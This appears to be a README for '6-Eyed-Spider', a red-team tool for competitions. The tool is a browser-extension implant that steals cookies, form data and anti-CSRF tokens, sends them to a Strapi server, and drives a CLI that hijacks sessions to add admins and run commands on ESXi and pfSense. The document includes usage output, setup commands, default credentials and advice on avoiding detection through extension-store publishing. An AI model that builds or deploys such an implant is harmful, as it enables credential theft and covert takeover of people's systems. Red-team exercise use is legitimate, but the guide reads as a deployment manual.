6-Eyed-Spider Post-Exploitation Red-Team Tool

Nowadays, they are many command and control projects. However, the medium of most of the existing C2s is operating systems. We rarely see a C2 that controls a specific part of an operating system like browsers.

6-Eyed-Spider is the first of its kind. It’s almost like a C2 that targets browsers. 6-Eyed-Spider’s implants are browsers extensions that gather all data going out and coming into the browser and receives commands from the 6-Eyed-Spider’s server.

Logo

Table of contents:

Hypothesis

6-Eyed-Spider is a post-exploitation Red-Teaming tool. It gathers data going out and coming into the browser — data like POST requests, cookies, and chosen headers like (ANTI-CSRF headers), then sends all data to Strapi. Strapi and MongoDB store the data so that 6-Eyed-Spider-CLI can use the collected data to perform specific attacks. Attacks using the users’ valid cookies to execute commands, create admin users, enable unsafe functionalities, manipulate data in systems like VMware, Pfsense, and PanOS.

The tool takes advantage of how web applications usually are designed. No matter how many authentication steps a web application uses, there will be a weak point where if you know specific tokens, you will be able to interact with the application without the need for reauthenticating. The tool uses these specific tokens to perform critical tasks as authenticated users. It also deals with Anti-CSRF protection; thus, almost every request can be passed.

The tool consists of a couple of parts:

  • Dockerized MongoDB and Strapi
    • MongoDB stores the collected data.
    • Strapi receives and manages the collected data.
  • Google-Chrome Extention
    • Collects the browser’s data from the blue team.
  • 6-Eyed-Spider-CLI
    • Runs custom made plugins which make use of the collected data.

Tool requirements and characteristics - Research tasks

6-Eyed-Spider is a hidden channel that focuses on providing data over HTTP protocol, which would be classified as a “subliminal” post-exploitation tool. That is due to the idea that the tool is working after the exploiting stage; with the caveats being that the communication must look standard and/or typical on that platform, and that is by using the browser itself or in this case Chrome itself to send the data without any additional processes.

Robustness

Due to the number of packers coming out and in via browsers, it would be very reasonable to predict that victims are not going to think about the traffic of the browser they are using. This specific tool could be undiscovered the whole competition period unless the blue team specifically closes port 80/443 for all binaries, including installed the browsers, which is super rare for blue teamers to stop the traffic of their browsers. They might block port 80/443 via the firewall. But most of the time, they make an exception for their browsers to reach different sites that they need. And in IRSec competitions, they need to reach their ESXI to use their VMs; thus, the need for the browsers is Inevitable.

Detection

Browsers extensions are usually just javascript files; thus, antiviruses don’t scan them. Plus, many extensions have the same type of code. The extension calls regular functions then sends the data using HTTP, and that doesn’t look unusual for a browser.

Prevention

The tool needs to consider how to prevent detection. The current version is not verified by Google Chrome nor Firefox; thus, Developer mode has to be enabled in the browser for the extension to work, and the Developer mode is a flag for users since it’s not the standard mode that any user would use. It’s not visible unless the user goes to the extension page; to prevent that, a modified version of the tool can be published to Google and Firefox extension stores. This way, the extension can be verified and used without switching to the developer mode.

How I designed it

I used Javascript to design the Google Chrome extension, Strapi - Node.js, which is a JavaScript runtime built on Chrome’s V8 JavaScript engine, Python to build a beautiful command-line interface.

How it works

Browsers extension functionalities:

It gathers data going out and coming into the browser — data like POST requests, cookies, and chosen headers like (ANTI-CSRF headers), then sends all data to Strapi. Strapi and MongoDB store the data so that 6-Eyed-Spider-CLI can use the collected data to perform specific attacks.

Eyed-Spider-CLI functionalities:

Eyed-Spider-CLI is the command-line interface that using it. An attacker can forge requests and send commands to the browsers extension to send requests on behalf of the attackers.

The difference between the first and second functionalities is that the first request one will be sent from the attackers. The second functionality is that the request one will be sent directly from the victim’s device via the browser.

Dockerized MongoDB and Strapi functionalities:

Strapi is what the extension communicates with. It has multiple endpoints, and each one of them is for receives specific data. The extension will be programmed to send the data to specific ends according to the type of data.

6-Eyed-Spider-CLI should run customized plugins that make use of the valid collected data from the API. (I might add to them)

  • VMware

    • Add an administrator
    • Start SSH
  • Pfsense

    • Add an administrator
    • Execute a command

VMware:

On VMware web interface, there are four important tokens, vmware_client, vmware_soap_session, VMware_CSRF_Token, and SOAPAction. The browser extension will keep track of them, and update Strapi. Whenever the red team wants to add an administrator. Eyed-Spider-CLI can forge a request as an admin, or ask the extension to issue a request on behalf of the attackers.

pfSense:

To add an administrator or execute a command on pfsense, two tokens ae needed PHPSESSID and csrf_magic.  We could ask the extension to get all PHPSESSID and csrf_magic tokens on every browser under control; then we can forge requests as admins; thus, it will be clear in the logs that the admin itself is the one executed command or added a user. Or we could ask the extension itself to issues a request with PHPSESSID and csrf_magic on behalf of us.

How to:

Use 6-Eyed-Spider-CLI:

Welcome! Type ? to list commands
6-Eyed-Spider> ?

Documented commands (type help <topic>):
========================================
Add_ESXI_Admin           Print_all_ESXis_under_control     exit
ESXI_Enable_SSH          Print_all_pfSenses_under_control  help
Execute_pfSense_Command  Print_creds

6-Eyed-Spider> help Add_ESXI_Admin
Add admin user.
Usage: Add_ESXI_Admin <ESXI_IP> <USERNAME> <STRONG_PASSWORD> <Description>
Add_ESXI_Admin 192.168.1.10 BLACK_TEAM Liverpool!1!1! Description1
Add_ESXI_Admin 192.168.1.10 ADMIN Liverpool!1998 Description2

6-Eyed-Spider> help Execute_pfSense_Command
Enable SSH.
Usage: Execute_pfSense_Command <pfSense_IP> <Command>
Execute_pfSense_Command 192.168.1.10 id
Execute_pfSense_Command 192.168.1.10 whoami

6-Eyed-Spider> Execute_pfSense_Command 192.168.1.254 whoami

root

6-Eyed-Spider> Print_all_pfSenses_under_control

https://192.168.1.254/
https://192.168.2.254/
https://192.168.3.254/
https://192.168.4.254/

6-Eyed-Spider>

Install 6-Eyed-Spider:

[M507:~]$ bash Install.sh

Run the server manually:

[M507:~]$ # Start the database
[M507:~]$ docker-compose -f docker-compose-db.yml up --build -d
[M507:~]$ # Wait 20 seconds until its states changes to healthy
[M507:~]$ watch docker-compose -f docker-compose-db.yml ps
[M507:~]$ # Insert db.dump into the database, using this command
[M507:~]$ docker exec -i strapi-docker_db_1 sh -c 'mongorestore --archive'< RedAdmin.dmup
[M507:~]$ # Start the Strapi
[M507:~]$ docker-compose -f docker-compose-main.yml up --build -d

Or run Run.sh, which executes the same commands above.

[M507:~]$ bash Run.sh

Configure the admin panel and the API address from:

[M507:~]$ cat ./strapi-app/config/environments/development/server.json
{
  "host": "localhost",
  "port": 1337,
  "proxy": {
   "enabled": false
  },
  "autoReload": {
    "enabled": true
  },
  "cron": {
    "enabled": false
  },
  "admin": {
    "autoOpen": false
  }
}

Info ☄️ Default Admin panel: http://localhost:1337/admin Info ⚡️ Default Server: http://localhost:1337

Then with administrator privileges:

Default credentials: admin:RedAdmin

  • Insert all the targeted domains into: http://127.0.0.1:1337/Domains
  • Insert all the targeted headers into: http://127.0.0.1:1337/Headers
  • http://127.0.0.1:1337/Posts receives data from the public without any privileges.
  • /Posts receives: IP (String),ID (String), Site (String), and Data (Json), Type (String). Type: either “Cookie”, “Header”, or “Form”. An example:
    {
      "IP": "192.168.1.2",
      "ID": 31231,
      "Site": "https://aavtrain.com/index.asp",
      "Data": {
          "Submit": "Submit",
          "login": "true",
          "password": "MYPASSWORD",
          "user_name": "admin"
      },
      "Type": "Cookies"
    }
    

Clients:

Microsoft Windows [Version 10.0.17763.503]
(c) 2030 Microsoft Corporation. All rights reserved.

C:\Users\Mohad> .\New-ChromeExtension.ps1 (Powershell Payload attached).

6-Eyed-Spider-CLI Plugins:

6-Eyed-Spider-CLI runs customized plugins that make use of the valid collected data from the API.

  • VMware
    • Add an administrator
    • Start SSH
  • Pfsense
    • Add an administrator
    • Execute a command

Dependencies

  • Docker-compose

Future Work

  • Firefox extension configures itself based on the data in /domains and /headers.
  • Firefox extension sends All POST requests and cookies to /Posts as described above.
  • New-FirefoxExtension.ps1

The repo: 6-Eyed-Spider.